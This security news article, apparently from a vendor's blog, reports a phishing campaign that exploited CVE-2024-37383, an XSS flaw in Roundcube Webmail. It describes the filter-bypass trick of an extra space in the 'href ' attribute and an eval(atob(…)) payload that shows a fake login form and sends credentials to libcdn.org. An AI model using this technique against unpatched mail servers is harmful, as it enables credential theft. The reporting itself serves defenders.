These attackers used the flaw in a phishing campaign aimed at capturing the credentials of Roundcube users.
Researchers from Positive Technologies have raised alarms about unknown threat actors trying to exploit a recently patched vulnerability, identified as CVE-2024-37383 (with a CVSS score of 6.1), in the open-source Roundcube webmail software.
These attackers used the flaw in a phishing campaign aimed at capturing the credentials of Roundcube users.
In September 2024, Positive Technologies identified an email sent to a government organization in a CIS country. Analysis of the timestamps revealed that the email was dispatched in June 2024. Notably, the email had no content; it only included an attachment that was hidden from the email client.
The email body featured distinctive tags, including the statement eval(atob(…)), which the attackers used to decode and execute JavaScript code. Researchers observed that the attribute name (attributeName="href ") had an extra space, suggesting that this email was an attempt to exploit the CVE-2024-37383 vulnerability in Roundcube Webmail.
The vulnerability affects Roundcube Webmail versions earlier than 1.5.7 and 1.6.x prior to 1.6.7, enabling an attacker to carry out XSS attacks through SVG animate attributes. This issue was resolved in versions 1.5.7 and 1.6.7, released in May 2024.
By exploiting this vulnerability, an attacker could execute arbitrary JavaScript code within the recipient’s web browser.
The attacker could deceive the recipient into opening a specially crafted email using a vulnerable version of the Roundcube client to take advantage of the flaw.
“When an extra space is added to the “href” attribute name, the syntax will not be filtered and will appear in the final document. Before this, it will be formatted as {attribute name} = {attribute value}” reads the report published by Positive Technologies. “By inserting JavaScript code as the value for “href”, we can execute it on the Roundcube page whenever a Roundcube client opens a malicious email.”
The researchers also released proof-of-concept (PoC) exploit code for this vulnerability.
The JavaScript payload used in the attack saves an empty Word document titled "Road map.docx" and retrieves messages from the mail server through the ManageSieve plugin.
This attack generates a fake login form within the Roundcube interface, allowing it to capture user credentials and transmit them to a malicious server (libcdn.org) registered in 2024.
“Vulnerabilities in Roundcube Webmail have been a frequent target for cybercriminals. The latest such attack was a campaign linked to the Winter Vivern group, which exploited the XSS vulnerability in Roundcube to target government organizations in several European countries. However, based on the available information, the attack described in this article cannot be linked to known actors.” concludes the report.
“While Roundcube Webmail may not be the most widely used email client, it remains a target for hackers due to its prevalent use by government agencies. Attacks on this software can result in significant damage, allowing cybercriminals to steal sensitive information.”
Want your digital assets to be protected?
CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organization against all kinds of cyber threats.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.